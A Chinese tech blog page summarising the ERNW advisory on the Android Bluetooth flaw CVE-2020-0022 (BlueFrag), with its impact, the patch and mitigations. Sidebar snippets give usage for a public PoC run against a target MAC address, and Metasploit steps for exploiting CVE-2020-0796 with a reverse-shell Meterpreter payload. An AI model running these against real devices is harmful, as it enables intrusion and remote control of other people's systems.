安卓10蓝牙问题_CVE20200022:安卓蓝牙非交互漏洞

最新推荐文章于 2024-04-03 14:07:33 发布
最新推荐文章于 2024-04-03 14:07:33 发布
阅读量255 收藏
点赞数
文章标签: 安卓10蓝牙问题

aa820e03a6bfdcf50956660f7bfce61a.gif

2019年11月3日,ERNW研究人员向谷歌安卓团队报告了一个影响安卓系统蓝牙组件的关键漏洞。该漏洞CVE编号为CVE-2020-0022,在本月发布的安全补丁中已经修复了该安全漏洞。

该漏洞的安全影响如下:

· 在安卓8.0到9.0系统中,在蓝牙开启的情况下,远程攻击者在一定距离范围内可以以蓝牙守护程序的权限静默执行任意代码。整个过程无需用户交互,只需要知道目标设备的蓝牙MAC地址就可以了。而对一些设备,蓝牙的MAC地址可以通过WiFi MAC地址推算出来。该漏洞可能引发个人数据被窃,或用于传播恶意软件(短距离蠕虫)。

· 在安卓10系统中,该漏洞无法被利用,但可能会引发蓝牙守护进程奔溃。

· 低于安卓8.0的版本中也受到该漏洞的影响,但研究人员没有评估该影响。

研究人员强烈建议用户安装官方2月份发布的补丁。如果无法安装补丁或设备不再支持,可以尝试一些通用的方法:

· 非必需情况下不开启蓝牙。需要注意的是大多数蓝牙耳机都支持有线模拟音频。

· 设置设备蓝牙为不可见。只有当在蓝牙扫描菜单中设置后设备才是可见的。但一些老版本的手机可能设置的是一直可见。

研究人员称将在终端用户获得补丁后发布关于该漏洞的详细技术分析报告和PoC代码。

本文参考自:https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/

477cb07fbb14bdfd28e7a7fbb073568a.png

72eb2f5681d1fe03bc551cafe7599804.png

weixin_39522423
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android BLE设备蓝牙通信框架BluetoothKit
风语的专栏
08-29 2万+
这个框架源于目前一个智能家居APP项目,是蓝牙部分基础模块,用于蓝牙设备扫描、连接、通知等。由于目前接入的蓝牙设备大多为低功耗蓝牙设备,所以本框架暂不支持经典蓝牙的连接。项目地址: https://github.com/dingjikerbo/BluetoothKit先介绍本框架的特点: 一、支持经典蓝牙和BLE蓝牙混合扫描,支持自定义扫描策略 作为智能家居平台,接入的设备包括经典蓝牙和BLE,
Android 遇坑【8】- Android10 蓝牙扫描失败
Hsy的博客
03-14 9299
前言 最近遇到一个吊诡的问题,开发的APP在 华为荣耀V20 的测试中发现无法扫描到蓝牙设备。而手机系统蓝牙可以扫描得到。打断点调试发现其扫描回调未执行…多次尝试未果。 开始以为是该机型特有的问题,随后偶然看到其为Android10,这也是目前可供测试的唯一一部手机,考虑到安卓日益细分、严格的权限控制。我打开了 Android 10 隐私变更 ,终于解脱了。 原因 涉及到蓝牙功能如下,可以发现...
android9.0ble补丁蓝牙语音遥控器支持补丁.rar
07-21
ble audio补丁原理是利用hidraw节点捕捉协议栈发送的语音数据,目前Android Blueroid将ble语音数据和按键信息通过hid发送出去,通过建立hidraw节点,可以从中捕捉到语音数据。目前通过ble hal实现从hidraw中读取遥控器语音数据,在Android框架层上就通过配置文件将ble hal导入到音频框架中,并通过绑定Android原生已有的耳麦设备来完成audio音频策略选择,通过apk检测ble连接状态,通知audio服务耳麦设备的状态就可以使得录音通路切换至ble hal,实现从ble获取录音数据功能。 打补丁前最好使用干净的环境,不要有别家方案ble补丁,否则可能会有不兼容问题。 补丁如若不能使用首先检查节点是否存在和其权限,正常节点权限如下: ls -l /dev/hidraw* crw-rw---- 1 system audio 241, 0 2018-12-18 13:42 /dev/hidraw0 audio用户组有读写权限。 2、如果selinux模式为Enforcing,可以通过logcat搜索avc关键字。有如下类似提示则为异常,提示进程没有权限,检查sepolicy是否设置正常: avc: denied { read } for name="/" dev="tmpfs" ino=6145 scontext=u:r:mediaserver:s0 tcontext=u:object_r:device:s0 tclass=dir permissive=0 //Android 5.0和6.0版本,audio hal被mediaserver进程加载 avc: denied { read } for name="/" dev="tmpfs" ino=8125 scontext=u:r:audioserver:s0 tcontext=u:object_r:device:s0 tclass=dir permissive=0 //Android 7.0版本,audio hal被audioserver进程加载 avc: denied { read } for name="hidraw" dev="sysfs" ino=16332 scontext=u:r:hal_audio_default:s0 tcontext=u:object_r:sysfs:s0 tclass=dir permissive=0 //Android 8.0和9.0版本,audio hal被android.hardware.audio@2.0-service进程加载 3、检查audio的配置,打上patch后,首先确认小机上文件是否有修改到,目前文件可能位于/vendor/etc或/system/etc目录下,其中/vendor/etc下的配置文件是优先解析的。确保文件无误后,通过dumpsys media.audio_policy查看ble hal是否正常加载。 以下是相关说明: AudioPolicyManager: 0xf20c5200 Command Thread: 0xf20af140 Tones Thread: 0xf20af020 ... - Available input devices: Device 1: - id: 3 - type: AUDIO_DEVICE_IN_BUILTIN_MIC - Profiles: Profile 0: - format: AUDIO_FORMAT_PCM_16_BIT - sampling rates:8000, 11025, 12000, 16000, 22050, 24000, 32000, 44100, 48000 - channel masks:0x000c, 0x0010 Device 2: - id: 20 - type: AUDIO_DEVICE_IN_WIRED_HEADSET //对应的数值是0x80000010 - name: RemoteDM1204 - Profiles: Available input devices指示当前可用设备,目前ble hal是和AUDIO_DEVICE_IN_WIRED_HEADSET设备绑定,如果需要录音走ble hal,AUDIO_DEVICE_IN_WIRED_HEADSET设备必须出现在可用设备中,如果没有,就可能是补丁中hidaudio.apk的问题。 HW Modules dump: ... - H
Android蓝牙系统详解
Android framework
05-06 276
Android蓝牙开发(一),腾讯android面试题社招
最新发布
2301_79098684的博客
04-03 134
现在低功耗蓝牙(BLE)连接都是建立在GATT协议之上,GATT是一个在蓝牙连接之上的发送和接收很短的数据段的通用规范,健康设备开发:Bluetooth HDP (Health Device Profile) ,蓝牙血压计,蓝牙体重秤开发。提供对移动手机使用的蓝牙耳机的支持。它包含了Headset and Hands-Free (v1.5)配置文件。这些很短的数据段被称为属性(Attribute)
android配置蓝牙
m0_55875421的博客
07-04 752
android配置蓝牙
CVE-2020-0022蓝牙漏洞利用
huike008的博客
03-23 3052
漏洞的安全影响如下: · 在安卓8.0到9.0系统中,在蓝牙开启的情况下,远程攻击者在一定距离范围内可以以蓝牙守护程序的权限静默执行任意代码。整个过程无需用户交互,只需要知道目标设备的蓝牙MAC地址就可以了。而对一些设备,蓝牙的MAC地址可以通过WiFi MAC地址推算出来。该漏洞可能引发个人数据被窃,或用于传播恶意软件(短距离蠕虫)。 · 在安卓10系统中,该漏洞无法被利用,但可能会引发蓝牙守...
android蓝牙通信_Android蓝牙子系统“BlueFrag”漏洞分析(CVE20200022
weixin_39762478的博客
11-27 568
更多安全资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)一、漏洞背景2020年2月,Android安全公告中披露并修复了一个严重漏洞漏洞编号为CVE-2020-0022,又称BlueFrag,可影响Android蓝牙子系统。该漏洞是一个远程代码执行漏洞,出现在Bluedroid蓝牙协议栈的HCI层,当无线模块处于活动状态时,攻击...
Android 10 手机端关闭蓝牙再打开,蓝牙不会自动回连设备蓝牙
wq892373445的博客
06-23 3170
手机端关闭蓝牙再打开,蓝牙不会自动回连设备蓝牙
手机蓝牙调试助手
02-09
先在系统配对蓝牙,再启动软件,在软件中输入要发送带的蓝牙命令给智能设备,
cve-2020-0022:POVE for CVE-2020-0022
04-14
cve-2020-0022 POVE for CVE-2020-0022 用法 gcc poc.c -lbluetooth -o poc poc MAC_ADDR 信息 这个POC在Android 8.1.0上应该是稳定的,一旦它遇到截断的数据包,就会崩溃。 但是它的云常不稳定,在三星s9上肯定还不稳定。 在树莓派3B上运行poc已通过测试,可以。 在ThinkPad X1C 2018的Windows 10中使用vmware运行ubuntu / arch或在Mac OS X中使用Pd运行ubuntu无法截断代码,不知道为什么。 测试清单 具有Android 8.1.0的OnePlus 5T:稳定。 带有Android 9.0的Samsung s9 plus:不稳定。 搭载Android 9的Nova 3:稳定。
安卓10蓝牙问题_抓紧自查,安卓系统曝安全漏洞会受到恶意攻击
weixin_39525300的博客
10-22 139
如果你使用的不是最新的安卓手机,你可能需要检查一下是否有系统更新。网络安公司ERNW的安全研究人员详细介绍了一个名为BlueFrag的漏洞,该漏洞允许攻击者在附近运行Android 8 Oreo或Android 9 Pie的手机上传输恶意软件并窃取数据。入侵者只需要知道目标的蓝牙MAC地址,你甚至不会意识到攻击正在发生。安卓(图源网络)BlueFrag不能在Android 10上运行。Androi...
安卓10蓝牙问题_安卓系统蓝牙服务com.android.bluetooth的使能
weixin_39585675的博客
10-21 590
蓝牙系统服务层的使能流程分析蓝牙服务层的使能基础是其初始化完成,也就是AdapterService通过onBind()将AdapterServiceBinder上报给bind该服务的调用者。我们现在应该都知道在安卓系统中bind该服务的为BluetoothManagerService。本篇我们就从蓝牙服务管理收到bind的回调开启蓝牙使能流程的分析。熟悉安卓系统中bind服务机制的小伙伴应该都知道...
安卓10蓝牙问题_蓝牙网关使用过程中的10问题说明_95power
weixin_39600319的博客
10-23 307
95power提供2款蓝牙5.0网关、3款蓝牙4.2网关、2款4G蓝牙网关、1款大功率蓝牙网关等。下面就客户使用95power蓝牙网关的过程中比较关心的10问题作一下说明。95power蓝牙网关1 蓝牙网关里面的蓝牙默认不和蓝牙设备建立连接,只是扫描采集蓝牙设备数据(观察者模式);也可以和蓝牙设备建立连接,不过需要根据蓝牙设备的参数信息修改蓝牙网关的软件。2 我们的蓝牙网关出厂烧录的软件默认是...
安卓10蓝牙问题_安卓可以使用AirPods Pro吗?告诉你真实体验
weixin_39797693的博客
10-27 328
[PConline评测]安卓系统可以使用AirPods Pro吗?从AirPods Pro发布起,这问题一直备受关注,毕竟苹果官方宣称AirPods Pro兼容多种苹果设备,可没说兼容安卓机。我们知道其他AirPods产品是可以用在安卓机上的,那么AirPods Pro增加了降噪等多种功能,连接安卓机是否依然兼容?安卓系统连接、设置AirPods Pro需要怎么做? 苹果官方的兼容列表,可没说兼容...
Android 10+使用blueadapter搜索不到蓝牙设备的原因
couthz
03-17 7456
问题描述 在测试公司项目代码时,测试机能够在设置中与蓝牙设备进行配对,但测试的app中使用`blueadapter.startDiscovery()搜索不到设备,测试机的系统版本为Android10.0。 二 解决 查看Android官方文档关于蓝牙的部分:https://developer.android.com/guide/topics/connectivity/bluetooth 官方文...
Android 10 扫描蓝牙失败问题
夏至的稻穗的博客
07-30 1924
最近在开发蓝牙,发现在 Android 10 的设备上,只能扫描到已配对的设备,没匹配的设备,扫描不到,就广播没回调到;BLE 低功耗也扫描不到。 根据官网,已经添加了:ACCESS_FINE_LOCATION 精准定位了 还是不行,google 了一波,发现在 https://github.com/E。ddyVerbruggen/nativescript-bluetooth/issues/173 找到答案 开启gps后,就扫描到其他设备了,强制开启 gps 有点不优雅,可以添加个提示,让用户自己去开启
Android蓝牙连接问题总结
热门推荐
wangyetongsss的博客
12-07 2万+
最近开始接触Android的蓝牙设备问题,严格意义上来说,也算是第二次接触蓝牙机制了,之前对于蓝牙设备的整个过程,也不是太了解,只是接触了一些自己需要的部分。而这次应该算是比较深入的了解了蓝牙机制的部分吧,所以就总结一下这段时间对蓝牙的个人认识吧(此图片转自http://blog.csdn.net/l331258747/article/details/55261386)基本上关于蓝牙的流程,这张图...
msf win10漏洞_永恒之黑:CVE20200796漏洞复现
05-28
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒之黑”漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞的复现: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于法攻击和侵犯他人隐私。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值